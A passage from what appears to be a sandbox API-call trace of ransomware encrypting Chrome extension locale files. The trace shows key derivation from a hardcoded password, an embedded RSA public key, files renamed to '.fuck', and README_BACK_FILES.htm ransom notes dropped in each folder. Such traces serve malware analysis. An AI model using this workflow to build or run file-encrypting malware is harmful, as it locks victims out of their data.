(hKey=0x2984fa0) returned 1 [0253.288] CryptReleaseContext (hProv=0x298d670, dwFlags=0x0) returned 1 [0253.288] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0253.288] FindClose (in: hFindFile=0x2985ba0 | out: hFindFile=0x2985ba0) returned 1 [0253.288] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\readme_back_files.htm")) returned 0xffffffff [0253.288] AreFileApisANSI () returned 1 [0253.288] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0253.289] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0253.289] GetFileType (hFile=0x5d50) returned 0x1 [0253.289] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0253.291] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0253.291] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985ba0 [0253.291] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.291] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.291] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0253.292] GetLastError () returned 0x0 [0253.292] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json")) returned 0x20 [0253.292] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json", dwFileAttributes=0x80) returned 1 [0253.293] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0253.293] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0253.294] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0253.294] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298d670) returned 1 [0253.297] CryptCreateHash (in: hProv=0x298d670, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0253.297] lstrlenA (lpString="FGwqCokLNUQpiwojosdrnbCWzMlQm") returned 29 [0253.297] CryptHashData (hHash=0x29846a0, pbData=0x28cb4b8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0253.297] CryptDeriveKey (in: hProv=0x298d670, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2984fa0) returned 1 [0253.297] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----l", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0253.297] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0253.297] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2986a10) returned 1 [0253.297] CryptImportPublicKeyInfo (in: hCryptProv=0x2986a10, dwCertEncodingType=0x1, pInfo=0x2995de0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2995e10*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2995e18*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2985060) returned 1 [0253.297] CryptEncrypt (in: hKey=0x2985060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0253.298] CryptEncrypt (in: hKey=0x2985060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x29864c0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x29864c0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0253.298] WriteFile (in: hFile=0x5d60, lpBuffer=0x29864c0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x29864c0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0253.299] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xd7, lpOverlapped=0x0) returned 1 [0253.300] CryptEncrypt (in: hKey=0x2984fa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd7, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0253.300] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0253.300] CloseHandle (hObject=0x5d5c) returned 1 [0253.300] CloseHandle (hObject=0x5d60) returned 1 [0253.300] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json"), bFailIfExists=0) returned 1 [0253.303] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json", dwFileAttributes=0x0) returned 1 [0253.304] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json.gsg")) returned 1 [0253.305] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json.fuck")) returned 1 [0253.305] CryptDestroyHash (hHash=0x29846a0) returned 1 [0253.306] CryptDestroyKey (hKey=0x2984fa0) returned 1 [0253.306] CryptReleaseContext (hProv=0x298d670, dwFlags=0x0) returned 1 [0253.306] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0253.306] FindClose (in: hFindFile=0x2985ba0 | out: hFindFile=0x2985ba0) returned 1 [0253.306] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\readme_back_files.htm")) returned 0xffffffff [0253.306] AreFileApisANSI () returned 1 [0253.306] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0253.306] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0253.307] GetFileType (hFile=0x5d50) returned 0x1 [0253.307] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0253.308] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0253.308] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985ba0 [0253.308] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.308] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.308] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0253.309] GetLastError () returned 0x0 [0253.309] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json")) returned 0x20 [0253.309] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json", dwFileAttributes=0x80) returned 1 [0253.310] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0253.310] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0253.312] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0253.312] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298d670) returned 1 [0253.314] CryptCreateHash (in: hProv=0x298d670, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0253.314] lstrlenA (lpString="FGwqCokLNUQpiwojosdrnbCWzMlQm") returned 29 [0253.314] CryptHashData (hHash=0x29846a0, pbData=0x28cb3a0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0253.314] CryptDeriveKey (in: hProv=0x298d670, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2984fa0) returned 1 [0253.314] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----l", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0253.314] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0253.315] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2986b20) returned 1 [0253.315] CryptImportPublicKeyInfo (in: hCryptProv=0x2986b20, dwCertEncodingType=0x1, pInfo=0x2994f40*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2994f70*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2994f78*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2985120) returned 1 [0253.315] CryptEncrypt (in: hKey=0x2985120, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0253.315] CryptEncrypt (in: hKey=0x2985120, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2986ba8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2986ba8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0253.315] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2986ba8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2986ba8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0253.316] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xf5, lpOverlapped=0x0) returned 1 [0253.317] CryptEncrypt (in: hKey=0x2984fa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xf5, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x100) returned 1 [0253.317] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x100, lpOverlapped=0x0) returned 1 [0253.317] CloseHandle (hObject=0x5d60) returned 1 [0253.317] CloseHandle (hObject=0x5d5c) returned 1 [0253.317] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json"), bFailIfExists=0) returned 1 [0253.320] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json", dwFileAttributes=0x0) returned 1 [0253.321] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json.gsg")) returned 1 [0253.322] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json.fuck")) returned 1 [0253.323] CryptDestroyHash (hHash=0x29846a0) returned 1 [0253.324] CryptDestroyKey (hKey=0x2984fa0) returned 1 [0253.324] CryptReleaseContext (hProv=0x298d670, dwFlags=0x0) returned 1 [0253.324] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0253.324] FindClose (in: hFindFile=0x2985ba0 | out: hFindFile=0x2985ba0) returned 1 [0253.324] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\readme_back_files.htm")) returned 0xffffffff [0253.324] AreFileApisANSI () returned 1 [0253.324] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0253.324] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0253.325] GetFileType (hFile=0x5d50) returned 0x1 [0253.325] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0253.326] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0253.326] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985ba0 [0253.326] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.326] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.326] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0253.326] GetLastError () returned 0x0 [0253.326] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json")) returned 0x20 [0253.326] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json", dwFileAttributes=0x80) returned 1 [0253.327] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0253.327] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User 